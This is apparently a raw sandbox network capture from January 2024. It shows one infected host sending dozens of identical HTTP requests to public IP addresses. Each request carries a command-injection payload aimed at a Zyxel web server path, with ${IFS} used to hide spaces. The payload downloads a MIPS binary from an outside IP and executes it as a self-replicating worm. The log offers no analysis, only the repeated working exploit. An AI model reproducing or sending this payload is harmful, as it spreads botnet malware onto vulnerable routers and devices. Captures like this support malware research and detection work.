                                              Jan 29, 2024 07:03:40.821655035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2114192.168.2.1435570169.23.30.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821690083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2115192.168.2.1459176100.245.73.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821739912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2116192.168.2.1457338168.248.80.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821774960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2117192.168.2.1460358115.247.227.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821831942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2118192.168.2.1436706204.9.53.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821877003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2119192.168.2.1442798200.203.180.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821911097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2120192.168.2.1442612188.95.209.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821930885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2121192.168.2.1459106196.35.184.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.821975946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2122192.168.2.1445794184.90.43.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822001934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2123192.168.2.145991496.131.156.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822022915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2124192.168.2.1444576142.253.185.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822058916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2125192.168.2.143946281.220.252.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822091103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2126192.168.2.143413831.236.25.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822123051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2127192.168.2.144140627.108.59.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822185993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2128192.168.2.1453348204.13.131.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822213888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2129192.168.2.1434146170.251.216.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822249889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2130192.168.2.144394636.177.213.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822283983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2131192.168.2.1447996110.151.78.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822314978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2132192.168.2.14575864.235.34.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822366953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2133192.168.2.1438390154.155.117.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822402954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2134192.168.2.1442638219.151.228.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822431087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2135192.168.2.144591857.185.161.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822477102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2136192.168.2.145413252.69.35.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822510958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2137192.168.2.145954041.73.188.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822529078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2138192.168.2.1456918114.128.85.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822583914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2139192.168.2.1452382113.43.190.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822612047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2140192.168.2.144153220.58.203.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822662115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2141192.168.2.144520665.196.79.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822698116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2142192.168.2.145915474.4.204.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822743893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2143192.168.2.1455486102.96.170.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822783947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2144192.168.2.1457014161.128.28.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822810888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2145192.168.2.143466090.68.25.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822839022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2146192.168.2.1449834160.160.139.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822896957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2147192.168.2.1433084145.47.48.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822922945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2148192.168.2.1452054167.6.243.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.822959900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2149192.168.2.143676220.219.143.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823035955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2150192.168.2.143449236.76.34.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823079109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2151192.168.2.144652251.109.70.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823111057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2152192.168.2.1456722181.175.173.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823144913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2153192.168.2.1443304100.170.83.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823177099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2154192.168.2.145043836.106.14.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823198080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2155192.168.2.1443268118.168.207.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823242903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2156192.168.2.1454326158.125.157.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823299885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2157192.168.2.145310462.164.225.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823332071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2158192.168.2.1438646153.44.116.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823364973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2159192.168.2.1456142183.117.177.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823415041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2160192.168.2.1460300187.15.149.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823472023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2161192.168.2.1453642174.98.0.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823496103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2162192.168.2.143367632.103.6.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823542118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2163192.168.2.144242285.201.91.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823573112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2164192.168.2.1442566144.104.85.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823609114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2165192.168.2.1448774110.234.205.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823653936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2166192.168.2.146031014.150.156.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823704004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2167192.168.2.1441914189.123.48.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823729038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2168192.168.2.143404061.86.152.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823782921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2169192.168.2.143285632.252.84.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823826075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2170192.168.2.145522862.74.243.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823846102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2171192.168.2.1441668219.18.21.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823899031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2172192.168.2.1434608148.44.254.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823937893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2173192.168.2.1451394107.49.215.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.823965073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2174192.168.2.145570239.156.176.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824012995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2175192.168.2.145990614.101.171.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824044943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2176192.168.2.1452016186.143.133.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824062109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2177192.168.2.1450482131.41.65.203443
                                              TimestampBytes transferredDirectionData
